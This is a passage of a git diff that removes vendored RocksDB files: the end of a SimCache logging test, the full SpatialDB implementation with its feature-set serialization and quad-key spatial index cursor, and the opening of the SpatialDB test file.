-  ASSERT_EQ(0, simCache->GetPinnedUsage());
-  ASSERT_EQ(3 * kNumBlocks + 1,
-            simCache->get_hit_counter() + simCache->get_miss_counter());
-  ASSERT_EQ(6, simCache->get_hit_counter());
-}
-
-TEST_F(SimCacheTest, SimCacheLogging) {
-  auto table_options = GetTableOptions();
-  auto options = GetOptions(table_options);
-  options.disable_auto_compactions = true;
-  std::shared_ptr<SimCache> sim_cache =
-      NewSimCache(NewLRUCache(1024 * 1024), 20000, 0);
-  table_options.block_cache = sim_cache;
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  Reopen(options);
-
-  int num_block_entries = 20;
-  for (int i = 0; i < num_block_entries; i++) {
-    Put(Key(i), "val");
-    Flush();
-  }
-
-  std::string log_file = test::TmpDir(env_) + "/cache_log.txt";
-  ASSERT_OK(sim_cache->StartActivityLogging(log_file, env_));
-  for (int i = 0; i < num_block_entries; i++) {
-    ASSERT_EQ(Get(Key(i)), "val");
-  }
-  for (int i = 0; i < num_block_entries; i++) {
-    ASSERT_EQ(Get(Key(i)), "val");
-  }
-  sim_cache->StopActivityLogging();
-  ASSERT_OK(sim_cache->GetActivityLoggingStatus());
-
-  std::string file_contents = "";
-  ReadFileToString(env_, log_file, &file_contents);
-
-  int lookup_num = 0;
-  int add_num = 0;
-  std::string::size_type pos;
-
-  // count number of lookups
-  pos = 0;
-  while ((pos = file_contents.find("LOOKUP -", pos)) != std::string::npos) {
-    ++lookup_num;
-    pos += 1;
-  }
-
-  // count number of additions
-  pos = 0;
-  while ((pos = file_contents.find("ADD -", pos)) != std::string::npos) {
-    ++add_num;
-    pos += 1;
-  }
-
-  // We asked for every block twice
-  ASSERT_EQ(lookup_num, num_block_entries * 2);
-
-  // We added every block only once, since the cache can hold all blocks
-  ASSERT_EQ(add_num, num_block_entries);
-
-  // Log things again but stop logging automatically after reaching 512 bytes
-	int max_size = 512;
-  ASSERT_OK(sim_cache->StartActivityLogging(log_file, env_, max_size));
-  for (int it = 0; it < 10; it++) {
-    for (int i = 0; i < num_block_entries; i++) {
-      ASSERT_EQ(Get(Key(i)), "val");
-    }
-  }
-  ASSERT_OK(sim_cache->GetActivityLoggingStatus());
-
-  uint64_t fsize = 0;
-  ASSERT_OK(env_->GetFileSize(log_file, &fsize));
-	// error margin of 100 bytes
-  ASSERT_LT(fsize, max_size + 100);
-	ASSERT_GT(fsize, max_size - 100);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/utilities/spatialdb/spatial_db.cc b/thirdparty/rocksdb/utilities/spatialdb/spatial_db.cc
deleted file mode 100644
index 539ddd0..0000000
--- a/thirdparty/rocksdb/utilities/spatialdb/spatial_db.cc
+++ /dev/null
@@ -1,919 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/spatial_db.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <algorithm>
-#include <condition_variable>
-#include <inttypes.h>
-#include <string>
-#include <vector>
-#include <mutex>
-#include <thread>
-#include <set>
-#include <unordered_set>
-
-#include "rocksdb/cache.h"
-#include "rocksdb/options.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/table.h"
-#include "rocksdb/db.h"
-#include "rocksdb/utilities/stackable_db.h"
-#include "util/coding.h"
-#include "utilities/spatialdb/utils.h"
-#include "port/port.h"
-
-namespace rocksdb {
-namespace spatial {
-
-// Column families are used to store element's data and spatial indexes. We use
-// [default] column family to store the element data. This is the format of
-// [default] column family:
-// * id (fixed 64 big endian) -> blob (length prefixed slice) feature_set
-// (serialized)
-// We have one additional column family for each spatial index. The name of the
-// column family is [spatial$<spatial_index_name>]. The format is:
-// * quad_key (fixed 64 bit big endian) id (fixed 64 bit big endian) -> ""
-// We store information about indexes in [metadata] column family. Format is:
-// * spatial$<spatial_index_name> -> bbox (4 double encodings) tile_bits
-// (varint32)
-
-namespace {
-const std::string kMetadataColumnFamilyName("metadata");
-inline std::string GetSpatialIndexColumnFamilyName(
-    const std::string& spatial_index_name) {
-  return "spatial$" + spatial_index_name;
-}
-inline bool GetSpatialIndexName(const std::string& column_family_name,
-                                Slice* dst) {
-  *dst = Slice(column_family_name);
-  if (dst->starts_with("spatial$")) {
-    dst->remove_prefix(8);  // strlen("spatial$")
-    return true;
-  }
-  return false;
-}
-
-}  // namespace
-
-void Variant::Init(const Variant& v, Data& d) {
-  switch (v.type_) {
-    case kNull:
-      break;
-    case kBool:
-      d.b = v.data_.b;
-      break;
-    case kInt:
-      d.i = v.data_.i;
-      break;
-    case kDouble:
-      d.d = v.data_.d;
-      break;
-    case kString:
-      new (d.s) std::string(*GetStringPtr(v.data_));
-      break;
-    default:
-      assert(false);
-  }
-}
-
-Variant& Variant::operator=(const Variant& v) {
-  // Construct first a temp so exception from a string ctor
-  // does not change this object
-  Data tmp;
-  Init(v, tmp);
-
-  Type thisType = type_;
-  // Boils down to copying bits so safe
-  std::swap(tmp, data_);
-  type_ = v.type_;
-
-  Destroy(thisType, tmp);
-
-  return *this;
-}
-
-Variant& Variant::operator=(Variant&& rhs) {
-  Destroy(type_, data_);
-  if (rhs.type_ == kString) {
-    new (data_.s) std::string(std::move(*GetStringPtr(rhs.data_)));
-  } else {
-    data_ = rhs.data_;
-  }
-  type_ = rhs.type_;
-  rhs.type_ = kNull;
-  return *this;
-}
-
-bool Variant::operator==(const Variant& rhs) const {
-  if (type_ != rhs.type_) {
-    return false;
-  }
-
-  switch (type_) {
-    case kNull:
-      return true;
-    case kBool:
-      return data_.b == rhs.data_.b;
-    case kInt:
-      return data_.i == rhs.data_.i;
-    case kDouble:
-      return data_.d == rhs.data_.d;
-    case kString:
-      return *GetStringPtr(data_) == *GetStringPtr(rhs.data_);
-    default:
-      assert(false);
-  }
-  // it will never reach here, but otherwise the compiler complains
-  return false;
-}
-
-FeatureSet* FeatureSet::Set(const std::string& key, const Variant& value) {
-  map_.insert({key, value});
-  return this;
-}
-
-bool FeatureSet::Contains(const std::string& key) const {
-  return map_.find(key) != map_.end();
-}
-
-const Variant& FeatureSet::Get(const std::string& key) const {
-  auto itr = map_.find(key);
-  assert(itr != map_.end());
-  return itr->second;
-}
-
-FeatureSet::iterator FeatureSet::Find(const std::string& key) const {
-  return iterator(map_.find(key));
-}
-
-void FeatureSet::Clear() { map_.clear(); }
-
-void FeatureSet::Serialize(std::string* output) const {
-  for (const auto& iter : map_) {
-    PutLengthPrefixedSlice(output, iter.first);
-    output->push_back(static_cast<char>(iter.second.type()));
-    switch (iter.second.type()) {
-      case Variant::kNull:
-        break;
-      case Variant::kBool:
-        output->push_back(static_cast<char>(iter.second.get_bool()));
-        break;
-      case Variant::kInt:
-        PutVarint64(output, iter.second.get_int());
-        break;
-      case Variant::kDouble: {
-        PutDouble(output, iter.second.get_double());
-        break;
-      }
-      case Variant::kString:
-        PutLengthPrefixedSlice(output, iter.second.get_string());
-        break;
-      default:
-        assert(false);
-    }
-  }
-}
-
-bool FeatureSet::Deserialize(const Slice& input) {
-  assert(map_.empty());
-  Slice s(input);
-  while (s.size()) {
-    Slice key;
-    if (!GetLengthPrefixedSlice(&s, &key) || s.size() == 0) {
-      return false;
-    }
-    char type = s[0];
-    s.remove_prefix(1);
-    switch (type) {
-      case Variant::kNull: {
-        map_.insert({key.ToString(), Variant()});
-        break;
-      }
-      case Variant::kBool: {
-        if (s.size() == 0) {
-          return false;
-        }
-        map_.insert({key.ToString(), Variant(static_cast<bool>(s[0]))});
-        s.remove_prefix(1);
-        break;
-      }
-      case Variant::kInt: {
-        uint64_t v;
-        if (!GetVarint64(&s, &v)) {
-          return false;
-        }
-        map_.insert({key.ToString(), Variant(v)});
-        break;
-      }
-      case Variant::kDouble: {
-        double d;
-        if (!GetDouble(&s, &d)) {
-          return false;
-        }
-        map_.insert({key.ToString(), Variant(d)});
-        break;
-      }
-      case Variant::kString: {
-        Slice str;
-        if (!GetLengthPrefixedSlice(&s, &str)) {
-          return false;
-        }
-        map_.insert({key.ToString(), str.ToString()});
-        break;
-      }
-      default:
-        return false;
-    }
-  }
-  return true;
-}
-
-std::string FeatureSet::DebugString() const {
-  std::string out = "{";
-  bool comma = false;
-  for (const auto& iter : map_) {
-    if (comma) {
-      out.append(", ");
-    } else {
-      comma = true;
-    }
-    out.append("\"" + iter.first + "\": ");
-    switch (iter.second.type()) {
-      case Variant::kNull:
-        out.append("null");
-        break;
-      case Variant::kBool:
-        if (iter.second.get_bool()) {
-          out.append("true");
-        } else {
-          out.append("false");
-        }
-        break;
-      case Variant::kInt: {
-        char buf[32];
-        snprintf(buf, sizeof(buf), "%" PRIu64, iter.second.get_int());
-        out.append(buf);
-        break;
-      }
-      case Variant::kDouble: {
-        char buf[32];
-        snprintf(buf, sizeof(buf), "%lf", iter.second.get_double());
-        out.append(buf);
-        break;
-      }
-      case Variant::kString:
-        out.append("\"" + iter.second.get_string() + "\"");
-        break;
-      default:
-        assert(false);
-    }
-  }
-  return out + "}";
-}
-
-class ValueGetter {
- public:
-  ValueGetter() {}
-  virtual ~ValueGetter() {}
-
-  virtual bool Get(uint64_t id) = 0;
-  virtual const Slice value() const = 0;
-
-  virtual Status status() const = 0;
-};
-
-class ValueGetterFromDB : public ValueGetter {
- public:
-  ValueGetterFromDB(DB* db, ColumnFamilyHandle* cf) : db_(db), cf_(cf) {}
-
-  virtual bool Get(uint64_t id) override {
-    std::string encoded_id;
-    PutFixed64BigEndian(&encoded_id, id);
-    status_ = db_->Get(ReadOptions(), cf_, encoded_id, &value_);
-    if (status_.IsNotFound()) {
-      status_ = Status::Corruption("Index inconsistency");
-      return false;
-    }
-
-    return true;
-  }
-
-  virtual const Slice value() const override { return value_; }
-
-  virtual Status status() const override { return status_; }
-
- private:
-  std::string value_;
-  DB* db_;
-  ColumnFamilyHandle* cf_;
-  Status status_;
-};
-
-class ValueGetterFromIterator : public ValueGetter {
- public:
-  explicit ValueGetterFromIterator(Iterator* iterator) : iterator_(iterator) {}
-
-  virtual bool Get(uint64_t id) override {
-    std::string encoded_id;
-    PutFixed64BigEndian(&encoded_id, id);
-    iterator_->Seek(encoded_id);
-
-    if (!iterator_->Valid() || iterator_->key() != Slice(encoded_id)) {
-      status_ = Status::Corruption("Index inconsistency");
-      return false;
-    }
-
-    return true;
-  }
-
-  virtual const Slice value() const override { return iterator_->value(); }
-
-  virtual Status status() const override { return status_; }
-
- private:
-  std::unique_ptr<Iterator> iterator_;
-  Status status_;
-};
-
-class SpatialIndexCursor : public Cursor {
- public:
-  // tile_box is inclusive
-  SpatialIndexCursor(Iterator* spatial_iterator, ValueGetter* value_getter,
-                     const BoundingBox<uint64_t>& tile_bbox, uint32_t tile_bits)
-      : value_getter_(value_getter), valid_(true) {
-    // calculate quad keys we'll need to query
-    std::vector<uint64_t> quad_keys;
-    quad_keys.reserve((tile_bbox.max_x - tile_bbox.min_x + 1) *
-                      (tile_bbox.max_y - tile_bbox.min_y + 1));
-    for (uint64_t x = tile_bbox.min_x; x <= tile_bbox.max_x; ++x) {
-      for (uint64_t y = tile_bbox.min_y; y <= tile_bbox.max_y; ++y) {
-        quad_keys.push_back(GetQuadKeyFromTile(x, y, tile_bits));
-      }
-    }
-    std::sort(quad_keys.begin(), quad_keys.end());
-
-    // load primary key ids for all quad keys
-    for (auto quad_key : quad_keys) {
-      std::string encoded_quad_key;
-      PutFixed64BigEndian(&encoded_quad_key, quad_key);
-      Slice slice_quad_key(encoded_quad_key);
-
-      // If CheckQuadKey is true, there is no need to reseek, since
-      // spatial_iterator is already pointing at the correct quad key. This is
-      // an optimization.
-      if (!CheckQuadKey(spatial_iterator, slice_quad_key)) {
-        spatial_iterator->Seek(slice_quad_key);
-      }
-
-      while (CheckQuadKey(spatial_iterator, slice_quad_key)) {
-        // extract ID from spatial_iterator
-        uint64_t id;
-        bool ok = GetFixed64BigEndian(
-            Slice(spatial_iterator->key().data() + sizeof(uint64_t),
-                  sizeof(uint64_t)),
-            &id);
-        if (!ok) {
-          valid_ = false;
-          status_ = Status::Corruption("Spatial index corruption");
-          break;
-        }
-        primary_key_ids_.insert(id);
-        spatial_iterator->Next();
-      }
-    }
-
-    if (!spatial_iterator->status().ok()) {
-      status_ = spatial_iterator->status();
-      valid_ = false;
-    }
-    delete spatial_iterator;
-
-    valid_ = valid_ && !primary_key_ids_.empty();
-
-    if (valid_) {
-      primary_keys_iterator_ = primary_key_ids_.begin();
-      ExtractData();
-    }
-  }
-
-  virtual bool Valid() const override { return valid_; }
-
-  virtual void Next() override {
-    assert(valid_);
-
-    ++primary_keys_iterator_;
-    if (primary_keys_iterator_ == primary_key_ids_.end()) {
-      valid_ = false;
-      return;
-    }
-
-    ExtractData();
-  }
-
-  virtual const Slice blob() override { return current_blob_; }
-  virtual const FeatureSet& feature_set() override {
-    return current_feature_set_;
-  }
-
-  virtual Status status() const override {
-    if (!status_.ok()) {
-      return status_;
-    }
-    return value_getter_->status();
-  }
-
- private:
-  // * returns true if spatial iterator is on the current quad key and all is
-  // well
-  // * returns false if spatial iterator is not on current, or iterator is
-  // invalid or corruption
-  bool CheckQuadKey(Iterator* spatial_iterator, const Slice& quad_key) {
-    if (!spatial_iterator->Valid()) {
-      return false;
-    }
-    if (spatial_iterator->key().size() != 2 * sizeof(uint64_t)) {
-      status_ = Status::Corruption("Invalid spatial index key");
-      valid_ = false;
-      return false;
-    }
-    Slice spatial_iterator_quad_key(spatial_iterator->key().data(),
-                                    sizeof(uint64_t));
-    if (spatial_iterator_quad_key != quad_key) {
-      // caller needs to reseek
-      return false;
-    }
-    // if we come to here, we have found the quad key
-    return true;
-  }
-
-  void ExtractData() {
-    assert(valid_);
-    valid_ = value_getter_->Get(*primary_keys_iterator_);
-
-    if (valid_) {
-      Slice data = value_getter_->value();
-      current_feature_set_.Clear();
-      if (!GetLengthPrefixedSlice(&data, &current_blob_) ||
-          !current_feature_set_.Deserialize(data)) {
-        status_ = Status::Corruption("Primary key column family corruption");
-        valid_ = false;
-      }
-    }
-
-  }
-
-  unique_ptr<ValueGetter> value_getter_;
-  bool valid_;
-  Status status_;
-
-  FeatureSet current_feature_set_;
-  Slice current_blob_;
-
-  // This is loaded from spatial iterator.
-  std::unordered_set<uint64_t> primary_key_ids_;
-  std::unordered_set<uint64_t>::iterator primary_keys_iterator_;
-};
-
-class ErrorCursor : public Cursor {
- public:
-  explicit ErrorCursor(Status s) : s_(s) { assert(!s.ok()); }
-  virtual Status status() const override { return s_; }
-  virtual bool Valid() const override { return false; }
-  virtual void Next() override { assert(false); }
-
-  virtual const Slice blob() override {
-    assert(false);
-    return Slice();
-  }
-  virtual const FeatureSet& feature_set() override {
-    assert(false);
-    // compiler complains otherwise
-    return trash_;
-  }
-
- private:
-  Status s_;
-  FeatureSet trash_;
-};
-
-class SpatialDBImpl : public SpatialDB {
- public:
-  // * db -- base DB that needs to be forwarded to StackableDB
-  // * data_column_family -- column family used to store the data
-  // * spatial_indexes -- a list of spatial indexes together with column
-  // families that correspond to those spatial indexes
-  // * next_id -- next ID in auto-incrementing ID. This is usually
-  // `max_id_currenty_in_db + 1`
-  SpatialDBImpl(
-      DB* db, ColumnFamilyHandle* data_column_family,
-      const std::vector<std::pair<SpatialIndexOptions, ColumnFamilyHandle*>>&
-          spatial_indexes,
-      uint64_t next_id, bool read_only)
-      : SpatialDB(db),
-        data_column_family_(data_column_family),
-        next_id_(next_id),
-        read_only_(read_only) {
-    for (const auto& index : spatial_indexes) {
-      name_to_index_.insert(
-          {index.first.name, IndexColumnFamily(index.first, index.second)});
-    }
-  }
-
-  ~SpatialDBImpl() {
-    for (auto& iter : name_to_index_) {
-      delete iter.second.column_family;
-    }
-    delete data_column_family_;
-  }
-
-  virtual Status Insert(
-      const WriteOptions& write_options, const BoundingBox<double>& bbox,
-      const Slice& blob, const FeatureSet& feature_set,
-      const std::vector<std::string>& spatial_indexes) override {
-    WriteBatch batch;
-
-    if (spatial_indexes.size() == 0) {
-      return Status::InvalidArgument("Spatial indexes can't be empty");
-    }
-
-    const size_t kWriteOutEveryBytes = 1024 * 1024;  // 1MB
-    uint64_t id = next_id_.fetch_add(1);
-
-    for (const auto& si : spatial_indexes) {
-      auto itr = name_to_index_.find(si);
-      if (itr == name_to_index_.end()) {
-        return Status::InvalidArgument("Can't find index " + si);
-      }
-      const auto& spatial_index = itr->second.index;
-      if (!spatial_index.bbox.Intersects(bbox)) {
-        continue;
-      }
-      BoundingBox<uint64_t> tile_bbox = GetTileBoundingBox(spatial_index, bbox);
-
-      for (uint64_t x = tile_bbox.min_x; x <= tile_bbox.max_x; ++x) {
-        for (uint64_t y = tile_bbox.min_y; y <= tile_bbox.max_y; ++y) {
-          // see above for format
-          std::string key;
-          PutFixed64BigEndian(
-              &key, GetQuadKeyFromTile(x, y, spatial_index.tile_bits));
-          PutFixed64BigEndian(&key, id);
-          batch.Put(itr->second.column_family, key, Slice());
-          if (batch.GetDataSize() >= kWriteOutEveryBytes) {
-            Status s = Write(write_options, &batch);
-            batch.Clear();
-            if (!s.ok()) {
-              return s;
-            }
-          }
-        }
-      }
-    }
-
-    // see above for format
-    std::string data_key;
-    PutFixed64BigEndian(&data_key, id);
-    std::string data_value;
-    PutLengthPrefixedSlice(&data_value, blob);
-    feature_set.Serialize(&data_value);
-    batch.Put(data_column_family_, data_key, data_value);
-
-    return Write(write_options, &batch);
-  }
-
-  virtual Status Compact(int num_threads) override {
-    std::vector<ColumnFamilyHandle*> column_families;
-    column_families.push_back(data_column_family_);
-
-    for (auto& iter : name_to_index_) {
-      column_families.push_back(iter.second.column_family);
-    }
-
-    std::mutex state_mutex;
-    std::condition_variable cv;
-    Status s;
-    int threads_running = 0;
-
-    std::vector<port::Thread> threads;
-
-    for (auto cfh : column_families) {
-      threads.emplace_back([&, cfh] {
-          {
-            std::unique_lock<std::mutex> lk(state_mutex);
-            cv.wait(lk, [&] { return threads_running < num_threads; });
-            threads_running++;
-          }
-
-          Status t = Flush(FlushOptions(), cfh);
-          if (t.ok()) {
-            t = CompactRange(CompactRangeOptions(), cfh, nullptr, nullptr);
-          }
-
-          {
-            std::unique_lock<std::mutex> lk(state_mutex);
-            threads_running--;
-            if (s.ok() && !t.ok()) {
-              s = t;
-            }
-            cv.notify_one();
-          }
-      });
-    }
-
-    for (auto& t : threads) {
-      t.join();
-    }
-
-    return s;
-  }
-
-  virtual Cursor* Query(const ReadOptions& read_options,
-                        const BoundingBox<double>& bbox,
-                        const std::string& spatial_index) override {
-    auto itr = name_to_index_.find(spatial_index);
-    if (itr == name_to_index_.end()) {
-      return new ErrorCursor(Status::InvalidArgument(
-          "Spatial index " + spatial_index + " not found"));
-    }
-    const auto& si = itr->second.index;
-    Iterator* spatial_iterator;
-    ValueGetter* value_getter;
-
-    if (read_only_) {
-      spatial_iterator = NewIterator(read_options, itr->second.column_family);
-      value_getter = new ValueGetterFromDB(this, data_column_family_);
-    } else {
-      std::vector<Iterator*> iterators;
-      Status s = NewIterators(read_options,
-                              {data_column_family_, itr->second.column_family},
-                              &iterators);
-      if (!s.ok()) {
-        return new ErrorCursor(s);
-      }
-
-      spatial_iterator = iterators[1];
-      value_getter = new ValueGetterFromIterator(iterators[0]);
-    }
-    return new SpatialIndexCursor(spatial_iterator, value_getter,
-                                  GetTileBoundingBox(si, bbox), si.tile_bits);
-  }
-
- private:
-  ColumnFamilyHandle* data_column_family_;
-  struct IndexColumnFamily {
-    SpatialIndexOptions index;
-    ColumnFamilyHandle* column_family;
-    IndexColumnFamily(const SpatialIndexOptions& _index,
-                      ColumnFamilyHandle* _cf)
-        : index(_index), column_family(_cf) {}
-  };
-  // constant after construction!
-  std::unordered_map<std::string, IndexColumnFamily> name_to_index_;
-
-  std::atomic<uint64_t> next_id_;
-  bool read_only_;
-};
-
-namespace {
-DBOptions GetDBOptionsFromSpatialDBOptions(const SpatialDBOptions& options) {
-  DBOptions db_options;
-  db_options.max_open_files = 50000;
-  db_options.max_background_compactions = 3 * options.num_threads / 4;
-  db_options.max_background_flushes =
-      options.num_threads - db_options.max_background_compactions;
-  db_options.env->SetBackgroundThreads(db_options.max_background_compactions,
-                                       Env::LOW);
-  db_options.env->SetBackgroundThreads(db_options.max_background_flushes,
-                                       Env::HIGH);
-  db_options.statistics = CreateDBStatistics();
-  if (options.bulk_load) {
-    db_options.stats_dump_period_sec = 600;
-  } else {
-    db_options.stats_dump_period_sec = 1800;  // 30min
-  }
-  return db_options;
-}
-
-ColumnFamilyOptions GetColumnFamilyOptions(const SpatialDBOptions& options,
-                                           std::shared_ptr<Cache> block_cache) {
-  ColumnFamilyOptions column_family_options;
-  column_family_options.write_buffer_size = 128 * 1024 * 1024;  // 128MB
-  column_family_options.max_write_buffer_number = 4;
-  column_family_options.max_bytes_for_level_base = 256 * 1024 * 1024;  // 256MB
-  column_family_options.target_file_size_base = 64 * 1024 * 1024;      // 64MB
-  column_family_options.level0_file_num_compaction_trigger = 2;
-  column_family_options.level0_slowdown_writes_trigger = 16;
-  column_family_options.level0_stop_writes_trigger = 32;
-  // only compress levels >= 2
-  column_family_options.compression_per_level.resize(
-      column_family_options.num_levels);
-  for (int i = 0; i < column_family_options.num_levels; ++i) {
-    if (i < 2) {
-      column_family_options.compression_per_level[i] = kNoCompression;
-    } else {
-      column_family_options.compression_per_level[i] = kLZ4Compression;
-    }
-  }
-  BlockBasedTableOptions table_options;
-  table_options.block_cache = block_cache;
-  column_family_options.table_factory.reset(
-      NewBlockBasedTableFactory(table_options));
-  return column_family_options;
-}
-
-ColumnFamilyOptions OptimizeOptionsForDataColumnFamily(
-    ColumnFamilyOptions options, std::shared_ptr<Cache> block_cache) {
-  options.prefix_extractor.reset(NewNoopTransform());
-  BlockBasedTableOptions block_based_options;
-  block_based_options.index_type = BlockBasedTableOptions::kHashSearch;
-  block_based_options.block_cache = block_cache;
-  options.table_factory.reset(NewBlockBasedTableFactory(block_based_options));
-  return options;
-}
-
-}  // namespace
-
-class MetadataStorage {
- public:
-  MetadataStorage(DB* db, ColumnFamilyHandle* cf) : db_(db), cf_(cf) {}
-  ~MetadataStorage() {}
-
-  // format: <min_x double> <min_y double> <max_x double> <max_y double>
-  // <tile_bits varint32>
-  Status AddIndex(const SpatialIndexOptions& index) {
-    std::string encoded_index;
-    PutDouble(&encoded_index, index.bbox.min_x);
-    PutDouble(&encoded_index, index.bbox.min_y);
-    PutDouble(&encoded_index, index.bbox.max_x);
-    PutDouble(&encoded_index, index.bbox.max_y);
-    PutVarint32(&encoded_index, index.tile_bits);
-    return db_->Put(WriteOptions(), cf_,
-                    GetSpatialIndexColumnFamilyName(index.name), encoded_index);
-  }
-
-  Status GetIndex(const std::string& name, SpatialIndexOptions* dst) {
-    std::string value;
-    Status s = db_->Get(ReadOptions(), cf_,
-                        GetSpatialIndexColumnFamilyName(name), &value);
-    if (!s.ok()) {
-      return s;
-    }
-    dst->name = name;
-    Slice encoded_index(value);
-    bool ok = GetDouble(&encoded_index, &(dst->bbox.min_x));
-    ok = ok && GetDouble(&encoded_index, &(dst->bbox.min_y));
-    ok = ok && GetDouble(&encoded_index, &(dst->bbox.max_x));
-    ok = ok && GetDouble(&encoded_index, &(dst->bbox.max_y));
-    ok = ok && GetVarint32(&encoded_index, &(dst->tile_bits));
-    return ok ? Status::OK() : Status::Corruption("Index encoding corrupted");
-  }
-
- private:
-  DB* db_;
-  ColumnFamilyHandle* cf_;
-};
-
-Status SpatialDB::Create(
-    const SpatialDBOptions& options, const std::string& name,
-    const std::vector<SpatialIndexOptions>& spatial_indexes) {
-  DBOptions db_options = GetDBOptionsFromSpatialDBOptions(options);
-  db_options.create_if_missing = true;
-  db_options.create_missing_column_families = true;
-  db_options.error_if_exists = true;
-
-  auto block_cache = NewLRUCache(options.cache_size);
-  ColumnFamilyOptions column_family_options =
-      GetColumnFamilyOptions(options, block_cache);
-
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(ColumnFamilyDescriptor(
-      kDefaultColumnFamilyName,
-      OptimizeOptionsForDataColumnFamily(column_family_options, block_cache)));
-  column_families.push_back(
-      ColumnFamilyDescriptor(kMetadataColumnFamilyName, column_family_options));
-
-  for (const auto& index : spatial_indexes) {
-    column_families.emplace_back(GetSpatialIndexColumnFamilyName(index.name),
-                                 column_family_options);
-  }
-
-  std::vector<ColumnFamilyHandle*> handles;
-  DB* base_db;
-  Status s = DB::Open(db_options, name, column_families, &handles, &base_db);
-  if (!s.ok()) {
-    return s;
-  }
-  MetadataStorage metadata(base_db, handles[1]);
-  for (const auto& index : spatial_indexes) {
-    s = metadata.AddIndex(index);
-    if (!s.ok()) {
-      break;
-    }
-  }
-
-  for (auto h : handles) {
-    delete h;
-  }
-  delete base_db;
-
-  return s;
-}
-
-Status SpatialDB::Open(const SpatialDBOptions& options, const std::string& name,
-                       SpatialDB** db, bool read_only) {
-  DBOptions db_options = GetDBOptionsFromSpatialDBOptions(options);
-  auto block_cache = NewLRUCache(options.cache_size);
-  ColumnFamilyOptions column_family_options =
-      GetColumnFamilyOptions(options, block_cache);
-
-  Status s;
-  std::vector<std::string> existing_column_families;
-  std::vector<std::string> spatial_indexes;
-  s = DB::ListColumnFamilies(db_options, name, &existing_column_families);
-  if (!s.ok()) {
-    return s;
-  }
-  for (const auto& cf_name : existing_column_families) {
-    Slice spatial_index;
-    if (GetSpatialIndexName(cf_name, &spatial_index)) {
-      spatial_indexes.emplace_back(spatial_index.data(), spatial_index.size());
-    }
-  }
-
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(ColumnFamilyDescriptor(
-      kDefaultColumnFamilyName,
-      OptimizeOptionsForDataColumnFamily(column_family_options, block_cache)));
-  column_families.push_back(
-      ColumnFamilyDescriptor(kMetadataColumnFamilyName, column_family_options));
-
-  for (const auto& index : spatial_indexes) {
-    column_families.emplace_back(GetSpatialIndexColumnFamilyName(index),
-                                 column_family_options);
-  }
-  std::vector<ColumnFamilyHandle*> handles;
-  DB* base_db;
-  if (read_only) {
-    s = DB::OpenForReadOnly(db_options, name, column_families, &handles,
-                            &base_db);
-  } else {
-    s = DB::Open(db_options, name, column_families, &handles, &base_db);
-  }
-  if (!s.ok()) {
-    return s;
-  }
-
-  MetadataStorage metadata(base_db, handles[1]);
-
-  std::vector<std::pair<SpatialIndexOptions, ColumnFamilyHandle*>> index_cf;
-  assert(handles.size() == spatial_indexes.size() + 2);
-  for (size_t i = 0; i < spatial_indexes.size(); ++i) {
-    SpatialIndexOptions index_options;
-    s = metadata.GetIndex(spatial_indexes[i], &index_options);
-    if (!s.ok()) {
-      break;
-    }
-    index_cf.emplace_back(index_options, handles[i + 2]);
-  }
-  uint64_t next_id = 1;
-  if (s.ok()) {
-    // find next_id
-    Iterator* iter = base_db->NewIterator(ReadOptions(), handles[0]);
-    iter->SeekToLast();
-    if (iter->Valid()) {
-      uint64_t last_id = 0;
-      if (!GetFixed64BigEndian(iter->key(), &last_id)) {
-        s = Status::Corruption("Invalid key in data column family");
-      } else {
-        next_id = last_id + 1;
-      }
-    }
-    delete iter;
-  }
-  if (!s.ok()) {
-    for (auto h : handles) {
-      delete h;
-    }
-    delete base_db;
-    return s;
-  }
-
-  // I don't need metadata column family any more, so delete it
-  delete handles[1];
-  *db = new SpatialDBImpl(base_db, handles[0], index_cf, next_id, read_only);
-  return Status::OK();
-}
-
-}  // namespace spatial
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/spatialdb/spatial_db_test.cc b/thirdparty/rocksdb/utilities/spatialdb/spatial_db_test.cc
deleted file mode 100644
index 7e0d674..0000000
--- a/thirdparty/rocksdb/utilities/spatialdb/spatial_db_test.cc
+++ /dev/null
@@ -1,307 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <vector>
-#include <string>
-#include <set>
-
-#include "rocksdb/utilities/spatial_db.h"
-#include "util/compression.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "util/random.h"
-
-namespace rocksdb {
-namespace spatial {
-
-class SpatialDBTest : public testing::Test {
- public:
-  SpatialDBTest() {
-    dbname_ = test::TmpDir() + "/spatial_db_test";
-    DestroyDB(dbname_, Options());
-  }
-
-  void AssertCursorResults(BoundingBox<double> bbox, const std::string& index,
-                           const std::vector<std::string>& blobs) {
-    Cursor* c = db_->Query(ReadOptions(), bbox, index);
-    ASSERT_OK(c->status());
-    std::multiset<std::string> b;
-    for (auto x : blobs) {
-      b.insert(x);
-    }
-
-    while (c->Valid()) {
-      auto itr = b.find(c->blob().ToString());
-      ASSERT_TRUE(itr != b.end());
-      b.erase(itr);
-      c->Next();
-    }
-    ASSERT_EQ(b.size(), 0U);
-    ASSERT_OK(c->status());
-    delete c;
-  }
-
-  std::string dbname_;
-  SpatialDB* db_;
-};
-
-TEST_F(SpatialDBTest, FeatureSetSerializeTest) {
-  if (!LZ4_Supported()) {
-    return;
-  }
-  FeatureSet fs;
-
-  fs.Set("a", std::string("b"));
-  fs.Set("x", static_cast<uint64_t>(3));
-  fs.Set("y", false);
